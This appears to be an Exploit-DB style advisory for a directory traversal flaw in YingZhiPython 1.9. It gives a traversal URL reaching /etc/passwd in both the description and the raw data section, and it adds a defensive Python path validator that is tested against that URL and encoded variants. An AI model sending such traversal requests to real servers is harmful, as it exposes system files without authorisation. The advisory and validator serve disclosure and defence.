Vendor: YingZhiPython
By: SecurityFocus
CVSS: 7.5 (HIGH)
Information Disclosure
CWE: 22
Product Name: YingZhiPython
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: Yes
Related CWE: N/A
CPE: a:yingzhi:yingzhipython:1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

YingZhiPython 1.9 Information Disclosure Vulnerability

YingZhiPython 1.9 contains an information disclosure vulnerability: a directory traversal flaw allows an attacker to obtain sensitive information by sending a specially crafted HTTP request containing '../' sequences to the vulnerable server. An example of such a request is ftp://www.example.com/../../../../../../../private/etc/passwd

Mitigation:

Upgrade to the latest version of YingZhiPython
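
On the server side, a traversal of this kind is stopped by resolving the requested path and refusing anything that lands outside the served directory. The following is an added example, not YingZhiPython code or its patch; the function names and directory layout are assumptions, and the request list is constructed (it includes the advisory's example URL).

```python
import os
import tempfile
from urllib.parse import unquote, urlsplit


class TraversalError(ValueError):
    """The requested path resolves outside the served root."""


def resolve_under_root(root, requested):
    """Return the real path for `requested`, or raise if it leaves `root`."""
    # Accept a full URL (as in the advisory's example) or a bare path.
    path = urlsplit(requested).path if "://" in requested else requested
    path = unquote(path).replace("\\", "/")  # covers %2e%2e/ and ..\ forms
    if "\x00" in path:
        raise TraversalError("NUL byte in path")
    root_real = os.path.realpath(root)
    # realpath collapses '../' and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(root_real, path.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TraversalError(f"{requested!r} escapes the served root")
    return candidate


def is_allowed(root, requested):
    try:
        resolve_under_root(root, requested)
        return True
    except TraversalError:
        return False


def demo():
    # Constructed layout: <tmp>/served is the root, <tmp>/outside is not.
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "served")
        os.makedirs(os.path.join(root, "docs"))
        os.makedirs(os.path.join(base, "outside"))
        os.symlink(os.path.join(base, "outside"), os.path.join(root, "link"))
        requests = [
            "/docs/readme.txt",                    # ordinary request
            "ftp://www.example.com/../../../../../../../private/etc/passwd",
            "/docs/%2e%2e/%2e%2e/outside/secret",  # percent-encoded dots
            "/link/secret",                        # symlink out of the root
        ]
        return [is_allowed(root, r) for r in requests]


if __name__ == "__main__":
    print(demo())
```

Comparing resolved paths with `os.path.commonpath` rather than a string prefix also rejects sibling directories such as `served2` that merely share the root's name as a prefix.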
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected. 

ftp://www.example.com/../../../../../../../private/etc/passwd